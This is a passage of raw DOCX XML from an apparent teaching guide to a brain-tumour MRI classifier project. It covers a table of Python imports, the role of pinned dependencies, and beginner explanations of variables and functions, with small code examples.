      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sklearn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are packages containing dozens of specialized sub-modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Library:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A broader umbrella term for a comprehensive collection of packages and modules designed to solve a broad problem domain (e.g., OpenCV for Computer Vision, TensorFlow for Deep Learning).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Class:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A blueprint or template for creating objects, defining data attributes and behavior methods (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tf.keras.layers.Dense</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PIL.Image.Image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Function:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A reusable, named block of code that takes zero or more inputs (parameters), performs computation, and optionally returns an output (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>compute_gradcam()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Object:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A concrete in-memory instance created from a class blueprint (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>model = tf.keras.models.load_model(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> creates an in-memory Model object).</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4.2 Comprehensive Import Inspection Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is every import statement across </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>01_data_exploration.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>02_model_training.ipynb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w: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120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Import Statement</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Source Type</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Library/Package</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Purpose in Project</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What Happens If Removed?</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Plausible Alternatives</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`import os`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Python Standard Library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`os`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Operating system interactions (directory navigation, path parsing).</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File path lookups and filesystem queries fail with `NameError: name 'os' is not defined`.</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`pathlib`, `sys`</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`from pathlib import Path`</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Python Standard Library</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`pathlib`</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Object-oriented filesystem path resolution with cross-platform slash handling (`/` vs `\`).</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Path manipulations crash across Windows/Linux environments.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`os.path`</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`import glob`</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Python Standard Library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`glob`</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Pattern-based wildcard file search (e.g., `glob.glob("dataset/Testing/glioma/*.jpg")`).</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Cannot dynamically discover and list test images in directories.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`os.scandir()`, `os.listdir()`, `Path.glob()`</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`import hashlib`</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Python Standard Library</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`hashlib`</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Computes MD5 cryptographic checksums for image deduplication and leakage auditing.</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Cannot verify dataset hygiene or detect duplicate images between train and test.</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`xxhash`, `zlib.crc32`</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`import random`</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Python Standard Library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`random`</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Sets pseudo-random seeds and samples random images for visualization grids.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Sample image grids cannot be generated reproducibly.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`numpy.random`</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`from collections import Counter`</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Python Standard Library</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`collections`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High-performance frequency counting for image dimensions, aspect ratios, and color modes.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Counting image resolutions requires manual, slow dictionary iteration.</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Standard `dict` loops</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`import numpy as np`</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`numpy`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Vectorized numerical computing, array reshaping, tensor slicing, and `argmax` probability decoding.</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The entire mathematical backbone of the project collapses immediately.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None (NumPy is the universal standard)</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`import pandas as pd`</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`pandas`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Tabular data structures (`DataFrame`) for dataset counts, class balances, and audit records.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Summary statistics and audit tables must be formatted manually as raw dictionaries.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`polars`, Python `csv`</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`from PIL import Image`</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`Pillow (PIL)`</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High-level image loading, decoding raw byte streams from Streamlit file uploaders, and format verification.</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Streamlit cannot ingest or decode uploaded user image files into memory.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`imageio`, `cv2.imdecode`</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`import cv2`</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`opencv-python`</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Image resizing (bilinear interpolation), BGR-to-RGB color conversion, and applying `COLORMAP_JET` to Grad-CAM heatmaps.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Cannot apply thermal heatmaps to Grad-CAM or resize NumPy arrays fast.</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`matplotlib.cm`, `scikit-image`</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`import matplotlib.pyplot as plt`</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`matplotlib`</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Generating static research plots, loss/accuracy curves, and multi-image diagnostic comparison grids.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Cannot render learning curves or multi-panel diagnostic figures in notebooks.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`seaborn`, `plotly`</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`import seaborn as sns`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`seaborn`</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Statistical visualization, specifically rendering annotated, color-scaled Confusion Matrix heatmaps.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Confusion matrices can only be viewed as raw numeric text grids.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`matplotlib.pyplot.matshow`</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`from sklearn.metrics import classification_report, confusion_matrix`</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`scikit-learn`</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Computes precision, recall, F1-scores, support counts, and the 4x4 confusion matrix array.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Clinical performance metrics cannot be calculated without writing manual math formulas.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Custom manual calculation</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`import tensorflow as tf`</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`tensorflow`</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Deep Learning computational framework: compiles computational graphs, executes GPU/CPU kernels, and runs neural networks.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The neural network cannot be trained, loaded, or executed.</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`PyTorch`, `JAX`</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`from tensorflow.keras import layers, models`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`tensorflow` (Keras API)</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Constructs neural network architectures via functional API: `Input`, `Dense`, `Dropout`, `BatchNormalization`, `Model`.</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Cannot build the classification head or compose the deep learning pipeline.</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Raw `tf.nn` operations</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`from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, ReduceLROnPlateau`</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`tensorflow.keras`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Training lifecycle hooks: automates saving best weights to disk, stops training on loss saturation, and decays learning rate.</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Risk of severe model overfitting; best epoch weights are lost when training finishes.</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Manual training loop with Python `if` statements</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`import streamlit as st`</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External Third-Party</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`streamlit`</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Reactive web application framework for building browser dashboards with pure Python.</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The user interface cannot run.</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`FastAPI + React`, `Flask + HTML/JS`</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4.3 Why Dependency Management &amp; `requirements.txt` Matter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In professional software engineering, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>environment reproducibility</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is paramount. If a colleague attempts to run this project on another computer using TensorFlow 2.11 or NumPy 2.0, catastrophic failures occur:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NumPy 2.0 C-API Breaking Changes:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TensorFlow binaries compiled against NumPy 1.x crash immediately when loaded with NumPy 2.0 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ImportError: numpy.core.multiarray failed to import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Keras 3 vs Keras 2 Discrepancies:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TensorFlow 2.16+ switched to Keras 3 as the default engine, changing how internal layers, training state, and functional graphs serialize.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">By pinning versions in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>numpy&gt;=1.24.0,&lt;2.0.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>tensorflow&gt;=2.15.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>), we lock the software ecosystem into a stable, tested matrix where all C-extensions and serialization APIs function seamlessly.</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5: Python Concepts Used in the Project</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.1 Concept Inventory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>This project utilizes 12 essential Python concepts. Below, each concept is dissected with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Simple Definition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Five-Year-Old Child Analogy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Generic Code Example</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Usage in Our Source Code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode If Removed or Altered</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1. Variables and Data Types</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Named storage locations in computer memory that hold specific types of data (integers, floating-point numbers, strings, booleans, lists, tuples, and multi-dimensional NumPy arrays).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Think of labeled toy boxes: one box only holds soft teddy bears (strings), another holds numbered building blocks (integers), and a third holds water cups filled to exact levels (floating-point numbers).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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image_size = (224, 224)  # Tuple of integers</w:t>
              <w:br/>
              <w:t xml:space="preserve">  class_name = "glioma"     # String</w:t>
              <w:br/>
              <w:t xml:space="preserve">  confidence = 0.942        # Floating-point number</w:t>
              <w:br/>
              <w:t xml:space="preserve">  is_tumor = True           # Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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CLASS_NAMES = ["glioma", "meningioma", "notumor", "pituitary"]</w:t>
              <w:br/>
              <w:t xml:space="preserve">  confidence = probs[pred_idx] * 100</w:t>
              <w:br/>
              <w:t xml:space="preserve">  is_healthy = (pred_class == "notumor")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Provides identifiers to track data dynamically throughout computation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hardcoding raw numbers and strings everywhere makes code unmaintainable and prone to typos.</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2. Functions, Parameters, and Return Values</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Reusable blocks of logic that accept inputs (parameters), perform operations, and return output values using the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> keyword.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>5-Year-Old Analogy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Like a bread toaster: you put in a slice of white bread (parameter), push the lever (function computation), and out pops warm toast (return value).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Small Example: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def calculate_percentage(score: float, total: float) -&gt; float:</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return (score / total) * 100.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Actual Project Usage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> In </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>app.py</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def create_superimposed_overlay(original_rgb, heatmap, alpha=0.45):</w:t>
              <w:br/>
              <w:t xml:space="preserve">      h, w, _ = original_rgb.shape</w:t>
              <w:br/>
              <w:t xml:space="preserve">      heatmap_resized = cv2.resize(heatmap, (w, h))</w:t>
              <w:br/>
              <w:t xml:space="preserve">      heatmap_uint8 = np.uint8(255 * heatmap_resized)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      jet_colormap = cv2.applyColorMap(heatmap_uint8, cv2.COLORMAP_JET)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      jet_rgb = cv2.cvtColor(jet_colormap, cv2.COLOR_BGR2RGB)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      superimposed = np.uint8(original_rgb * (1.0 - alpha) + jet_rgb * alpha)</w:t>
              <w:br/>
              <w:t xml:space="preserve">      return superimposed, jet_rgb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Why It Is Needed:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Eliminates duplicate code and encapsulates complex multi-step image transformations into clean, testable units.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Failure Mode:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1E293B"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Without functions, image blending code would need to be re-typed every time an image is shown, leading to bugs.</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3. Classes and Object-Oriented Programming (OOP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
      </w:pPr>
